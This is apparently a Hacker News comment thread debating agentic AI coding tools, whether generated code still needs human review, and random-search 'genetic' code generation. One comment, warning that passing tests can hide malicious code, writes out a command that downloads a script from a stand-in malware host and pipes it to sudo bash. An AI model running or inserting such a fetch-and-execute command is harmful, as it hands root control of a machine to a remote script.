>I've also found reviewing LLM generated code to be much more difficult and grueling than reviewing my own or another human's code.
absolute opposite here.
LLMs, for better or worse, generally stick to paradigms if they have the codebase in front of them to read.
This is rarely the case when dealing with an amateur's code.
Amateurs write functional-ish code. TDD-ish tests. If the language they're using supports it, types will be spotty or inconsistent. Variable naming schemes will change with whatever the trend was when the author wrote that snippet; and whatever format they want to use that day will use randomized vocabulary with lots of non-speak like 'value' or 'entry' in ambiguous roles.
LLMs write gibberish all day, BUT will generally abide by style documents fairly well. Humans... don't.
These things evolve as the codebase matures, obviously, but that's because it was polished into something good. LLMs can't reason well and their logic sometimes sucks, but if the AGENTS.md says that all variables shall be cat breeds -- damnit that's what it'll do (to a fault).
But my point: real logic and reasoning problems become easier to spot when you're not correcting stupid things all day. It's essentially always about knowing how to use the model and whatever platform it's jumping from. Don't give it the keys to create the logical foundation of the code; use it to polish brass.
False equivalency. The maintenance and expertise required to run the codebase you’ve generated still falls flatly on you. When you use a library or a framework it normally is domain experts that do that stuff.
I’m so glad we’ve got domain experts to write those tricky things like left-pad for us.
On a more serious note, I do think that the maintenance aspect is a differentiator, and that if it’s something that you end up committing to your codebase then ownership and accountability falls to you. Externally sourced libraries and frameworks ultimately have different owners.
I'm reminded of the recent "vibe coded" OCaml fiasco[1].
In particular, the PR author's response to this question:
> Here's my question: why did the files that you submitted name Mark Shinwell as the author?
> > Beats me. AI decided to do so and I didn't question it.
The same author submitted a similar PR to Julia as well. Both were closed in part due to the significant maintenance burden these entirely LLM-written PRs would create.
> This humongous amount of code is hard to review, and very lightly tested. (You are only testing that basic functionality works.) Inevitably the code will be full of problems, and we (the maintainers of the compiler) will have to pay the cost of fixing them. But maintaining large pieces of plausible-in-general-but-weird-in-the-details code is a large burden.
Setting aside the significant volume of code being committed at once (13K+ lines in the OCaml example), the maintainers would have to review code even the PR author didn't review - and would likely fall into the same trap many of us have found ourselves in while reviewing LLM-generated code... "Am I an idiot or is this code broken? I must be missing something obvious..." (followed by wasted time and effort).
The PR author even admitted they know little about compilers - making them unqualified to review the LLM-generated code.
I've been doing this forever, but just a few days ago I tried connecting VS Code to Github Copilot. The experience wasn't entirely unpleasant. I'm still on a familiar IDE and fall back to traditional development patterns whenever I want, while relying on Copilot to make targeted changes that I would find too simple and tedious to manually do.
Try Cursor Composer! It's the most natural transition. Exactly what you're currently doing, but it inserts the code snippets for you from within your IDE.
> a) never plan on learning and just care about outputs, or
> b) are an abstraction maximilist.
As a Claude Code user for about 6 months, I don't identify with either of these categories. Personally I switched to Claude Code because I don't particularly enjoy VScode (or forks thereof). I got used to a two window workflow - Claude Code for AI-driven development, and Goland for making manual edits to the codebase. As of a few months ago, Claude Code can show diffs in Goland, making my workflow even smoother.
My only gripe with the Goland integration is if you have multiple terminals open with CC, it will randomly switch to the first terminal for no apparent reason. Then, if you aren't paying close attention, you prompt the wrong instance.
I really love AI for lots of things, but, when I'm reading a post, the AI aesthetic has started to grate. I read articles and they all have the same "LLM" aesthetic, and I feel like I'm reading posts written by the same person.
Sure, the information is all there, but the style just puts me off reading it. I really don't like how few authors have a voice any more, even if that voice is full of typos and grammatical errors.
There isn't a specific place, it's the general aesthetic. Maybe you do sound like an LLM :P I guess it's not unlikely to pick up some mannerisms from them when everyone is using them.
I guess I don't really mind the use of an LLM or not, it's more the style that sounds very samey with everything else. Whether it's an LLM or not is not very relevant, I guess.
My brain kinda shuts off when I read this stuff because I know it's more of a "text shaped object" than actual text. I find LLM text to be too fluffy and information sparse much of the time so I subconsciously start skimming it more than actually reading it.
>I built a genetic algorithm simulator with interactive visualizations showing evolution in real-time including complex fitness functions, selection pressure, mutation rates, and more in 1 day. I didn't write a single line of the code.
I'm really trying to understand this.
From a learner's point of view this is useless because you aren't learning anything.
From an entrepreneur point of view it's useless too, I suppose? I wouldn't ship something I'm not 100% sure about how it works.
>> You no longer need to review the code. Or instruct the model at the level of files or functions. You can test behaviors instead.
I think this is where things will ultimately head. You generate random code, purely random in raw machine-readable binary, and simply evaluate a behavior. Most randomly generated code will not work. Some, however, will work, and within that working code, some will be far faster, and this is the code that is used.
No different than what a geneticist might do evaluating generated mutants for favorable traits. Knowledge of the exact genes or pathways involved is not even required, one can still select among desired traits and therefore select for that best fit mechanism without even knowing it exists.
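To make the idea concrete, here is a toy sketch (mine, purely illustrative; nothing in this thread specifies a mechanism): candidate "programs" are random postfix expressions over a tiny token set, and the only spec is a behavioral check on sample inputs.

```python
# Toy "generate at random, select on behavior" search. Candidates are random
# postfix (RPN) expressions in x; the only spec is the behavioral test below.
import random

TOKENS = ["x", "x", "1", "2", "3", "+", "-", "*"]

def random_program(length=5):
    # A random sequence of tokens; many will be ill-formed, that's fine.
    return [random.choice(TOKENS) for _ in range(length)]

def run(program, x):
    stack = []
    for tok in program:
        if tok == "x":
            stack.append(x)
        elif tok.isdigit():
            stack.append(int(tok))
        else:
            if len(stack) < 2:
                return None          # ill-formed candidate: reject
            b, a = stack.pop(), stack.pop()
            stack.append(a + b if tok == "+" else a - b if tok == "-" else a * b)
    return stack[-1] if len(stack) == 1 else None

def behaves_correctly(program):
    # The behavioral spec: we want f(x) = x*x + 1, checked on sample inputs only.
    return all(run(program, x) == x * x + 1 for x in range(-5, 6))

candidates = 0
while True:
    candidates += 1
    prog = random_program()
    if behaves_correctly(prog):
        print(f"found {prog} after {candidates} random candidates")
        break
```

Even this toy version typically burns through a few thousand random candidates to find a five-token program, which is exactly the scaling objection raised further down the thread.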
Why should we throw away decades of development in deterministic algorithms? Why do tech people mention "geneticists"? I would never select an algorithm with a "good" flying trait to make an airplane work; that's nuts.
But you have selected an algorithm with a "good" flying trait already for making airplanes, just via another avenue than pure random generation. The evolution of the bird has come up with another algorithm, for example, where they use flapping wings instead of thrust from engines. Even in airplane development, a lot was learned by studying birds, which are the result of a random walk algorithm.
No, there is no selection and no traits to pick; it's the culmination of research and human engineering. An airplane is a complex system that needs serious engineering. You can study birds, but only up to a certain point; if you like it, go bird watching, but it's everything except engineering.
First of all, natural selection doesn't happen per se, nor is it controlled by some inherent mechanism; it's the by-product of many factors, external and internal. So the comparison is just wrong. Human engineering is an iterative process, not a selection. And if we want to call it selection, even though it is a stretch, we're controlling it, we're the master of puppets; natural selection is anything but a controlled process. We don't select a more resistant wing, we engineer the wing with a high bending tolerance. Again, it's an iterative process.
We do select for a more resistant wing. How did we determine that this wing is more resistant? We modeled its bending tolerance and selected this particular design against other designs that had worse evaluated results for bending tolerance.
By that logic, everything humans do is per definition result of natural selection. Everything is a sphere if you zoom out far enough.
However your starting definition was more limited. it was specifically about "creating candidates at random, then just picking the one that performs best" - and that's definitely not how airplanes are designed.
That's a lie; people will eventually find a way out, it was always like that, be it open source or by innovating and eventually leaving the tech giants that can't innovate to die. We have Linux, and this year will be the most exciting for the Linux desktop given how bad the Windows situation is.
Only been hearing that for twenty years and these tech giants are bigger than they’ve ever been.
I remember when people said Open Office was going to be the default because it was open source, etc etc etc. It never happened. Got forked. Still irrelevant.
I said "being it open source or by innovating" eg Google innovated and killed many, also contributed a lot to open source. Android is a Linux success, ChromeOS too. Now Google stinks and it is not innovating anymore, except for when other companies, like OpenAI, come for their lunch. Google was caught off guard but eventually catching up. Sooner or later, big tech gets eaten by next big tech. I agree if we stop innovating that would never happen, like Open Office is the worst example you could have picked
The problem is that programming logic/state is discrete and not continuous, so you can't assume similar behaviour given "similar state", and the number of possible states grows exponentially.
Selecting the desired state will mean writing an extremely detailed spec that is akin to a programming language, which is what Dijkstra hinted at in the past.
Maybe, but you won't be able to test all behaviors and you won't have enough time to try a million alternatives. Just because of the number of possibilities, it'll be faster to just read the code.
That's why you buy a quantum computer. It writes every possible piece of software at once and leaves you the trivial task of curating the one you want.
Eventually the generation and evaluation will be fast enough that testing a million alternatives will be viable. It's impressive that you suggest there might be a million alternatives but that it would still be faster to just read the code and settle on one. How might that be determined? Did the author who wrote the standard library really come up with the best way when writing those functions? Or did they come up with something that seemed alright to ship relative to other ideas people came up with?
I think we need to think outside the box here and realize ideas can be generated, evaluated, and settled upon far faster than any human operates. The idea of doing what a trillion humans evaluating different functions can do is actually realistic with the path of our present technology. We are at the cusp of some very remarkable times, even more remarkable than the innovations of the past 200 years, should we make progress on this effort.
A million alternatives is peanuts. Restricting the search space to text files with 37 possible symbols (letters, numbers, space), a million different files can be generated with just 4 symbols.
A trillion is 8 symbols. You still haven't reached the end of your first import statement.
I just took a random source file on my computer. It has about 8000 characters. The number of possible files with 8000 characters has 12500 digits.
At this point, restricting the search space to syntactically valid programs (how do you even randomly generate that?) won't make a difference.
We definitely would need centuries for this, because Moore's law has been dead for a while, while the number of possible programs grows exponentially with program length.
But I hope we have more efficient ways to do this in a century.
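The arithmetic above is easy to check with a few lines of standard-library Python (the 37-symbol alphabet is the one assumed in the comment):

```python
# Back-of-the-envelope check of the search-space numbers above,
# assuming a 37-symbol alphabet (26 letters + 10 digits + space).
import math

ALPHABET = 37

print(ALPHABET ** 4)    # 1874161 -> ~1.9 million distinct 4-character files
print(ALPHABET ** 8)    # 3512479453921 -> ~3.5 trillion 8-character files

# Number of decimal digits in the count of all 8000-character files:
digits = math.floor(8000 * math.log10(ALPHABET)) + 1
print(digits)           # 12546 -> "about 12,500 digits"
```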
For this to work, you'd have to fully specify the behavior of your program in the tests. Put another way, at that point your tests are the program. So the question is, which is a more convenient way to specify the behavior of a program: a traditional programming language, or tests written in that language. I think the answer should be fairly obvious.
Behavior does not need to be fully specified at the outset. It could be evaluated after the run. We've actually done this before in our own technology. We studied birds and their flight characteristics, and took lessons from that for airplane development. What is a bird but the output of a random walk algorithm selected by constraints bound by so many latent factors we might never fully grasp?
> Behavior does not need to be fully specified at the outset. It could be evaluated after the run.
This doesn't work when the software in question is written by competent humans, let alone the sort of random process you describe. A run of the software only tells you the behavior of the software for a given input; it doesn't tell you all possible behaviors of the software. "I ran the code and the output looked good" is nowhere near sufficient.
> We've actually done this before in our own technology. We studied birds and their flight characteristics, and took lessons from that for airplane development.
There is a vast chasm between "bioinspiration is sometimes a good technique" and "genetic algorithms are a viable replacement for writing code".
Genetic algorithms created our species, which are far more complex than anything we have written in computer science. I think they have stood up to the tests of creating a viable product for a given behavior.
And with future compute, you will be able to evaluate behavior across an entire range of inputs for countless putative functions. There will be a time when none of this is compute bound. It is today, but in three centuries or more?
> Genetic algorithms created our species, which are far more complex than anything we have written in computer science. I think they have stood up to the tests of creating a viable product for a given behavior.
Yes, and our species is a fragile, barely functioning machinery with an insane number of failing points, and hilariously bad and inefficiently placed components.
I can see a lot of negatives in relation to removing the human readable aspect of software development. Thorough testing would be virtually impossible because we’d be relying on fuzzing to iron out potential edge cases or bugs.
In this situation, AI companies are incentivised to host the services their tooling generates. If we don't get source code, it is much easier for them to justify not sharing it. Plus, who is to say the machine code even works on consumer hardware anyway? It leads to a future where users specify inputs while companies generate programs and handle execution. Everything becomes a black box. No thank you.
All these questions are true for agriculture, yet you say "yes thank you, and please continue" for that industry I am sure, which seeks to improve product through random walk and unknown mechanisms. Maybe take a step back and examine your own biases.
> All these questions are true for agriculture, yet you say "yes thank you, and please continue" for that industry I am sure, which seeks to improve product through random walk and unknown mechanisms.
Tell me you know nothing about modern agriculture without telling me that
Exactly. As compute increases these algorithms will only get more compelling. You can test and evaluate so many more ideas than any human inventors can generate on their own.
All fun and games until you need to debug the rat's nest that you've been continually building. I am actually shocked that people who have coded before have been one-shotted into believing this.
If a bug rears its head it can be dealt with. Again, this is essentially already practiced by humans through breeding programs. Bugs have come up, such as deleterious traits, and we have either engineered solutions to get around them or worked to purge the alleles behind the traits from populations under study. Nothing is ever bug free. The question is if the bugs are show stoppers or not. And random walk iteration can produce more solutions that might get around those bugs.
We would of course need to specify the behaviors to test for. The more precisely we specify these behaviors, the more complexly our end product would be able to behave. We might invent a formal language for writing down these behaviors, and some people might be better at thinking about what kind of tests would need to be written to coax a certain type of end result out of the machine.
But that's future music, forgive a young man for letting his imagination run wild! ;)
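For what it's worth, the closest existing thing to such a "behavior language" is probably property-based testing. A minimal sketch using Python's hypothesis library (my choice of example, not something proposed above): the test pins down what a sort must do while saying nothing about how it is implemented.

```python
# Property-based test: the *behavior* is specified (output is ordered and is a
# permutation of the input); the implementation is left entirely open.
from collections import Counter
from hypothesis import given, strategies as st

def my_sort(xs):
    # The implementation under test; could be hand-written, LLM-written,
    # or found by random search -- the spec below doesn't care.
    return sorted(xs)

@given(st.lists(st.integers()))
def test_sort_behavior(xs):
    out = my_sort(xs)
    # Behavior 1: output is ordered.
    assert all(a <= b for a, b in zip(out, out[1:]))
    # Behavior 2: output is a permutation of the input.
    assert Counter(out) == Counter(xs)
```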
If we consider other fields such as biology, behaviors of interest are specified, but I'm not sure a formal language is currently being used per se. Data are evaluated on dimensional terms that could be either quantitative or qualitative. Meta-analysis of some sort might be used to reduce dimensionality to some degree, but that usually happens owing to lack of power for higher resolution models.
One big advantage of this future random walk paradigm is that you would not be bound by the real-world constraints of sample collection of biological data. Datasets could be made arbitrarily large, and the cost to do so will follow an inverse relationship with compute gains.
Not saying a training set or a present LLM. A truly random binary generator left to its own devices. Let's evaluate what spits out from that, iterated several trillion times over, with the massive compute capability we will have. I am not thinking of this happening in the next couple of years, but in the next couple of centuries.
We also burn carbon to feed the brain. Compute is what is increasing in capability on the scale of orders of magnitudes just within our own lifetimes. Brainpower is not increasing in capability. If you want future capabilities and technological advancement to occur at the fastest pace possible, eventually we have to leave the slow ape brain behind in favor of sources of compute that can evaluate functions several orders of magnitude faster.
This is a recurring fantasy in LLM threads but makes little sense. Writing machine code is very difficult (even writing byte code for simple VMs is annoying and error-prone). Abstractions are beneficial and increase productivity (per human, per token). It makes essentially no sense to throw away seven decades of productivity increasing technologies to have neural nets punch cards again, and it's not going to happen unless tokens become unimaginably cheap.
Compute is always increasing on this planet. It makes no sense to stick with seven decade old paradigms from the time when we were simply transmuting mathematical proofs into computational functions. We should be exploring the void, we will have the compute for this. Randomness will take away the difficulty as we increase compute to parse over these random functions in reasonable time frames. The idea of limiting technological development to what our ape brain can conceive of on its own on human biological timescales is quite a shackle, honestly.
> You generate random code, purely random in raw machine-readable binary, and simply evaluate a behavior. Most randomly generated code will not work. Some, however, will work, and within that working code, some will be far faster, and this is the code that is used.
Humans are expensive, but this approach seems incredibly inefficient and expensive too. Even a junior can make steady progress against implementing a function; with your approach, monkey coding like that could take ages to write a single function. Estimates in software are already bad; they will get worse with your approach.
Today it might not work given what a junior could do against the cost of compute through random walk, but can you say the same in three centuries? We increase compute by the year, but our own brainpower does not increase on those terms. Estimates are that we are actually losing brainpower over time.
And how exactly do you foresee probabilistic systems working out in real life? Nobody wants software that seldom does what they expect, and which tends to trend toward desirable behavior over time (where "desirable" behavior is determined by the sum of global feedback and revenue/profit of the company producing it).
Today you send some money to your spouse but it's received by another person with the same name. Tomorrow you order food but your order gets mixed up with someone else's.
Tough luck, the system is probabilistic and you can only hope that the evolutionary pressures influence the behavior to change in desirable ways. This fantasy is a delusion.
You're thinking of probabilistic systems at run time. People are talking about probabilistic systems at compile time.
Whatever gets generated, if it passes tests and is observably in compliance with the spec, is accepted and made permanent. It's the clay we're talking about Jackson Pollocking, not the sculpture.
I'm not, I'm thinking of poorly engineered systems that display buggy, unintended behaviors at runtime.
> observably in compliance with the spec
That's so easy to say and so incredibly hard to implement! Most unintended behaviors will never end up being prohibited/defined in the specification written by non-programmers.
The act of translating requirements from human language into well-defined semantics is what programming is.
I think you misunderstand. Once established a function found through random walk is no different than a function found in any other way. If it works it works, if it doesn't it doesn't.
I didn't misunderstand. I'm talking about all the exciting unintended behaviors you're adding and all the invariants that you're not preserving by arriving at solutions through randomness rather than careful design and engineering.
Yes a function will always do "the exact same thing" at runtime, but that "thing" isn't guaranteed to be free from race conditions and other types of bugs.
When you sell them a technological solution to their problem, they expect it to work. When it doesn't, someone needs to be responsible for it.
Now, maybe I'm wrong, but I don't see any of the current AI leaders being like, "Yeah, you're right, this solution didn't meet your customer's needs, and we'll eat the resulting costs." They didn't get to be "thought leaders" in the current iteration of Silicon Valley by taking responsibility for things that got broken, not at all.
So that means you will need to take responsibility for it, and how can you make that work as a business model? Well, you pay someone - a human - who knows what they're looking at to review at least some of the code that the AI generates.
Will some of that be AI-aided? Of course. Can you make a lot of the guesswork go away by saying "use commonly-accepted design patterns" in your CLAUDE.md? Sure. But you'll still need someone to enforce it and take responsibility at the end of the day if it screws up.
You are thinking in terms of the next few years not the next few centuries. Plenty of software sold today fails to meet expectations and no one eats costs.
The "Council of models" is a good first step, but ultimately I found myself settling on an automated talent acquisition pipeline.
I have a BIRTHING_POOL.md that combines the best AGENTS.md and introduces random AI-generated mutations and deletions. The candidates are tested using take-home PRs which are reviewed by HR.md and TECH_MANAGER.md. TECH_MANAGER.md measures completion rate per tokens (effectiveness) and then sends the stack ranking of AGENT.mds to HR to manage the talent pool. If agent effectiveness drops low enough, we pull from the birthing pool and interview more candidates.
The end result is that it effectively manages a wider range of agent talents and you don't get into these agent hive mind spirals you get if every worker has the same system prompt.
It's all abstractions to help your brain understand what electrons are doing in impossibly pure sand. Pick the one that frees the most overhead to think about problems that matter
*Note:* This is mostly relevant for solo developers, where accountability is much lower than in a team environment.
Code review is the only thing that has kept this house of cards from falling over. So undermining its importance makes me question the hype around LLM tooling even more. I’ve been using these tools since their inception as well, but with AI tooling, we need to hold on to the best practices we’ve built over the last 50 years even more, instead of trying to reinvent the wheel in the name of “rethinking.”
Code generation is cheap, and reviews are getting more and more expensive. If you don’t know what you generated, and your team doesn’t know either because they just rubber-stamped the code since you used AI review, then no one has a proper mental model of what the code actually does.
So when things come crashing down in production, debugging and investigation will be a nightmare. We’re already seeing scenarios where on-call has no idea what’s going on with a system, so they page the SME—and apparently the SME is AI, and the person who did the work also has no idea what’s going on.
Until omniscient AI can do the debugging as well, we need to focus on how we keep practicing the things we’ve organically developed over such a long time, instead of discarding them.
You also no longer need to work, earn money, have a life, read, study, or know anything about the world. This is pure fantasy; my brain farts hard when I read sentences like that.
He shows an alleged screenshot of an email sent by the vendor. There is also a cool animation of what seems to be a chromosome gallery produced by the result of a genetic algorithm of some sort, which took Claude one day.
If you like Claude Code, then Gas Town (recent discussion [1]) will probably blow your mind. I'm just trying to get a grip on it myself. But it sounds incredible.
I am still a WindSurf user. It has the quirk of deciding for itself on any given day whether to use ChatGPT 5.2 or Claude Opus 4.5 in Cascade (its agentic side panel). I've never noticed much of a difference, they are both amazing.
I thought the difference must be in how Claude Code does the agentic stuff - reasoning with itself, looping until it finds an answer, etc. - but I have spent a fair amount of time with Claude Code now and found that agentic experience to be about the same between Cascade and Claude Code.
What am I missing? (Serious question, I do have Claude Code FOMO like the OP.)
Thank you for this article! It was way richer than others, with some actionable advice.
I guess I'll finally try Claude Code, need to get a burner SIM first though… I cannot for the life of me understand why I can just sign up for the API yet must give a mobile phone number for the product.
Technical preview was in June 2021. I was using it for a bit before that as an internal employee, so they may have rounded up slightly, or they were also in the internal beta test.
Side note: I’ve been trying to remember when it launched internally, if anybody knows. I feel like it was pre-COVID, but that’s a long timeline from internal use to public preview.
fair enough! the jump from that to ChatGPT’s launch (which I didn’t find that interesting), to gpt-4, to Claude Code/Codex CLI, to Gemini 3/Opus 4.5/GPT 5.2 has been insane in such a short time. I’m excited (since the release of the Codex CLI especially: https://dkdc.dev/posts/modern-agentic-software-engineering/)
More importantly: what software of value have they produced in that time? I glanced around their site, and just saw a bunch of teaching materials about AI.
10x in personal branding position, for sure. 5 years of AI usage by rounding up from 4-years-something, where the first 2 were really a glorified autocomplete, and top 0.01% of something something.
I use Cursor on a daily basis. It is good for certain use cases. Horribly bad for some others. Read the below with that in mind! I am not an LLM skeptic.
It is wild that people are so confident with AI that they're not testing the code at all.
What are we doing as programmers? Reducing the typing and testing time? Because we still have to write the prompt in English and do the software design; otherwise AI systems write a billion lines of code just to add two numbers.
This hype machine should show tangible outputs, and before anyone says they're entitled to not share their hidden talents then they should stop publishing articles as well.
Was also tempted by the price but GLM-4.6 was so terrible that I instantly subscribed to Claude again, it's just not worth it. Don't know if 4.7 is much improved but for me nothing can compete with Claude sadly.
This is a good guide on how to use Claude Code. My perspective (from an early adopter of LLMs for coding) is similar. Though OpenCode has a lot of potential as well, so I'm happy that Claude Code is not the only option.
But a key aspect imo is that using these tools is also a skill, and there's a lot of knowledge involved in making something good with the assistance of Claude Code vs. producing slop, especially as soon as you deviate from a very basic application or work in a larger repo with multiple people. There's a layer of context that these tools don't quite have, and it's very difficult to consistently provide them with it. I can see this being less the case as context windows grow and the reliability of larger context retrieval is solved.
I'm sympathetic to the notion that we're not at enterprise-codebase level (yet), but everyone who still thinks agentic coding stops at React CRUD apps needs to update their priors.
I needed a poc RAG pipeline to demo concepts to other teams. Built and tested this over the weekend, exclusively with Claude Code and a little OpenCode. Mix of mobile app and breaking out Android terminal to allow Sonnet 4.5 to run the dotnet build chain on tricky compilation issues.
Not sure why you’re getting downvoted, but that’s exactly what AI is turning out great for.. being able to make something in a weekend that would’ve taken weeks otherwise means other things downstream of it suddenly also become possible.
Any suggestions on what to add to answer the question better? I tried to cover this in "Why I switched", "When to use Cursor", and "My current setup" sections.
I have recently started using GitHub Copilot for some small personal projects and am blown away by how fast it is possible to create a solution that does the job. Of course it's not optimized for security or scaling, but it doesn't have to be. The most mind-blowing moment was when Copilot searched the API documentation and implemented everything, just asking me to add my API key to the .env. Wild times.
Regarding not reviewing the output: AI works great when you’re trying to sell it.
That being said, after seeing inside a couple of YC-backed SaaS companies, I believe you can get by without reading the code. There are bugs _everywhere_, yet one of these companies made it years and sold. I'm currently going through the onerous process of fixing this, as the new company has a lot of interest in reducing the defect count. It is painful, difficult, and it feels like the company bought a lemon.
I think the reality is there’s a lot of money to be made with buggy software. But, there’s still plenty of money in making reliable software as well (I think?).
Claude Code all the way! If anybody wants to help me beta test my own web-based setup for managing multiple Claude Code instances on Hetzner VPSes: clodhost.com!
Just completely hilarious how 6 months ago about 50% of Hacker News comments were AI denialists telling everybody they were full of shit and that LLMs were not useful. That group is awfully quiet nowadays. The bar has clearly moved to "eventually we won't even need to do code reviews".
LLM denialists were always wrong and they should be embarrassed to share their bad model of reality and how the world works.
Wouldn’t this kind of setup eat away tokens at a very fast rate, such that even the Max plan would quickly be overrun? Isn’t the more viable workflow to use Claude Code to create just one pull request at a time, lightly review the code, and allow it to be merged?
Is it just me, or has Claude Code gotten really stupid the last several days? I've been using it almost since it was publicly released, and the last several days it feels like it reverted back 6 months. I was almost ready to start yolo-ing everything, and now it's doing weird hallucinations again and forgetting how to edit files. It used to go into plan mode automatically; now it won't unless I make it.
- AI generated article
- Overconfident claims (which are based on solo dev)
- Spending an absurd amount on an LLM subscription
- No actual details, just buzzwords and generic claims
If AI-hype was a person
Canadian girlfriend AI coding strikes again.
ooo I love this term. Does it have an origin?
related meme i saw today:
“bro I spent all weekend in Claude Code it’s incredible”
“oh nice, what did you build?”
“dude my setup is crazy. i’ve got all the vercel skills, plus custom hooks for every project”
“sick, what are you building?”
“my setup is so optimized, i’m using like 5 instances at once”
https://x.com/johnpalmer/status/2012911338276720852?s=46
https://tvtropes.org/pmwiki/pmwiki.php/Main/GirlfriendInCana...
Also, what do you mean, "you do not need to review the code"? Why did you even start coding in the first place if this is a positive thing?
Did we just stop caring about the art of programming altogether?
Surprisingly, for some people, the goal is the goal, and they don't care much about the journey.
What's the model for integration and maintenance in that case, then? Just re-create the app every time?
hey claude, my users have told me that their boot.ini file is missing, was that us?
Just vibe it, let AI take the lead; follow the flow, enjoy the ride and check the result. Be the manager the bot needs; those annoying details don't have to be your concern any more.
I think the journey means different things to different people. Not everyone is interested in building their own power generation plant, mining silica and forging their own chips, or writing a programming language from binary. I’d love to do that stuff if I didn’t have bills to pay, but I sure am quite glad to skip the gnarly JavaScript implementation details, focus on the parts I know well (backend, data modeling, translating domain-specific knowledge into product), and get something to market.
See
https://news.ycombinator.com/item?id=46685489
https://news.ycombinator.com/item?id=46687347
Influenced by many comments on this site, I recently switched from $10 Github Copilot to $20 Claude Code and so far haven't seen any benefits. Maybe it's because I don't know how to 'close the agentic loop' in this project. I thought it being more agentic meant I can just tell it to research a subsystem on its own and plan the changes I want, but that caused it to spawn 3 subagents and consume the entire 4-hour token limit. Copilot feels more frugal with token usage.
For most of 2025, I ignored popular agents because I wanted to stay within my preferred text editor (Emacs). Thanks to ACP (https://agentclientprotocol.com), I no longer live under a rock ;) I built https://github.com/xenodium/agent-shell and now get a native experience. Claude Code works great. If curious what that looks like, I made a video recently https://xenodium.com/bending-emacs-episode-10-agent-shell
This is awesome. Thanks for chatgpt-shell.el too. It could use authinfo for API keys so you don't have to put them inside the config (saved in ~/.authinfo, format equivalent to ~/.netrc).
> You no longer need to review the code. Or instruct the model at the level of files or functions. You can test behaviors instead.
Maybe for a personal project but this doesn't work in a multi-dev environment with paying customers. In my experience, paying attention to architecture and the code itself results in a much more pliable application that can be evolved.
Agree. And with the comments in the thread.
I'll caveat my statement with "AI-ready repos", meaning those with good documentation, good comments (e.g. avoiding Chesterton's fence), comprehensive interface tests, Sentry, CI/CD, etc.
Established repos are harder because a) the marginal cost of something going wrong is much higher, b) there are more dependencies, and c) this makes it harder to 'comprehensively' ensure the AI didn't mess anything up.
I say this in the article:
> There's no "right answer." The only way to create your best system is to create it yourself by being in the loop. Best is biased by taste and experience. Experiment, iterate, and discover what works for you.
Try pushing the boundary. It's like figuring out the minimum amount of sleep you need. You undersleep and oversleep a couple times, but you end up with a good idea.
To be clear, I'm not advocating for canonical 'vibe coding', just that what it means to be a good engineer has changed again. 1) Being able to quickly create a mental map of code at the speed of changes, 2) debugging and refactoring, 3) prompting, and 4) ensuring everything works (verifiability) are now the most valuable skills.
We should also focus more on the derivative than our point in time.
> Being able to quickly create a mental map of code at the speed of changes
I get the feeling you're intentionally being a parody with that line.
> and ensuring everything works (verifiability) are now the most valuable skills.
Something might look like it works, and pass all the tests, but it could still be running `wget https://malware.sh | sudo bash`. Without knowing that it's there how will your tests catch it?
My example is exaggerated and in the real world it will be more subtle and less nefarious, but just as dangerous. This has already happened, OpenCode is a recent such example. It was on the front page a few days ago, you should check it out. Of course you have to review the code. Who are you trying to fool?
> We should also focus more on the derivative than our point in time.
So why are you selling it as possible in "our point in time" (are you getting paid per buzzword?). I read the quote as "Yes, I'm full of shit, but consider the possibilities and stop being a buzzkill bro".
Extremely depressing to see this happening to the craft I used to love.
Counter argument...
High velocity teams also observe production system telemetry and use error rates, tracing and more to maintain high SLAs for customers.
They set a "budget" and use feature flagging to release risky code and roll back or roll forward based on metrics.
So agentic coding can feed back on observed behaviors in production too.
It's definitely an area where we'll all learn a lot in the upcoming years.
But we have to use this "innovation budget" in a careful way.
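A toy sketch of that feedback loop, in case it helps; the flag name, the threshold, and the fake telemetry below are all stand-ins I made up for illustration:

```python
# Hypothetical error-budget check: roll a flag back when the observed error
# rate blows the budget, otherwise keep ramping exposure up.
import random

ERROR_BUDGET = 0.01                 # tolerate at most 1% of requests failing
FLAG = "new_checkout_flow"          # made-up feature flag

class FlagStore:
    """In-memory stand-in for a real feature-flag service."""
    def __init__(self):
        self.exposure = {FLAG: 0.05}          # start by exposing 5% of traffic
    def roll_forward(self, flag, step=0.10):
        self.exposure[flag] = min(1.0, self.exposure[flag] + step)
    def roll_back(self, flag):
        self.exposure[flag] = 0.0

def observed_error_rate(flag):
    # Stand-in for querying real telemetry (error rates, tracing, SLO dashboards).
    return random.uniform(0.0, 0.03)

def evaluate_rollout(flags):
    rate = observed_error_rate(FLAG)
    if rate > ERROR_BUDGET:
        flags.roll_back(FLAG)
        print(f"{FLAG}: error rate {rate:.2%} blew the budget, rolled back")
    else:
        flags.roll_forward(FLAG)
        print(f"{FLAG}: error rate {rate:.2%} within budget, "
              f"exposure now {flags.exposure[FLAG]:.0%}")

flags = FlagStore()
for _ in range(5):
    evaluate_rollout(flags)
```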
^this
It doesn't work... yet. I agree my stomach churns a little at this sentence. However, paying customers care about reliability and performance. Code review helps with that today, but it's only a matter of time before it becomes more performative than useful in serving those goals, at the cost of velocity.
The (multi) billion dollar question is when that will happen, I think. Case in point:
The OP is a kid in his 20s describing the history of the last 3 years or so of small-scale AI development (https://www.linkedin.com/in/silen-naihin/details/experience/)
How does that compare to those of us with 15-50 years of software engineering experience working on giant codebases that have years of domain rules, customers and use cases etc.
When will AI be ready? Microsoft tried to push AI into big enterprise, Anthropic is doing a better job - but it's all still in its infancy.
Personally for me I hope it won't be ready for another 10 years so I can retire before it takes over :)
I remember when folks on HN all called this AI stuff made up
This is what people were saying about Rails 20 years ago: it wows the kids who use it to set up a CRUD website quickly but fails at anything larger-scale. They were kind of right in the sense that engineering a large complex system with Rails doesn't end up being particularly easier than with Plone or Mason or what have you. Maybe this will just be Yet Another Framework.
Ruby on Rails is an interesting hype counterpoint.
A substantial number of the breathless LLM hype results come, in my estimation, quicker and better from 15-minute RoR tutorials. [Fire up a calculator (from a library), a pretty visualization (from a JS library), add some persistence (baked-in DB, webhost), customize navigation … presto! You actually built a personal application.]
Fundamental complexity, engineering, scaling gotchas, accessibility needs, and customer insanity aren’t addressed. RoR optimizes for some things, and like any other optimization that’s not always meaningful.
LLMs have undeniable utility, natural interaction is amazing, and hunting in Reddit, stackoverflow, and MSDN forums ‘manually’ isn’t a virtue… But when the VC subsidies stop and the psychoses get proper names and the right kind of egg hits the right kind of face over unreviewed code, who knows, maybe we can make a fun hype cycle called “Actual Engineering” (AE®).
That’s the problem: most of the “noise” regarding AI is made by juniors who are wowed by the ability to vibe code some fun “side project” React CRUD apps, like compound interest calculators or PDF converters.
No mention of the results when targeting bigger, more complex projects that require maintainability, sound architectural decisions, etc… which is actually the bread and butter of SW engineering and where the big bucks get made.
>>like compound interest calculators or PDF converters.
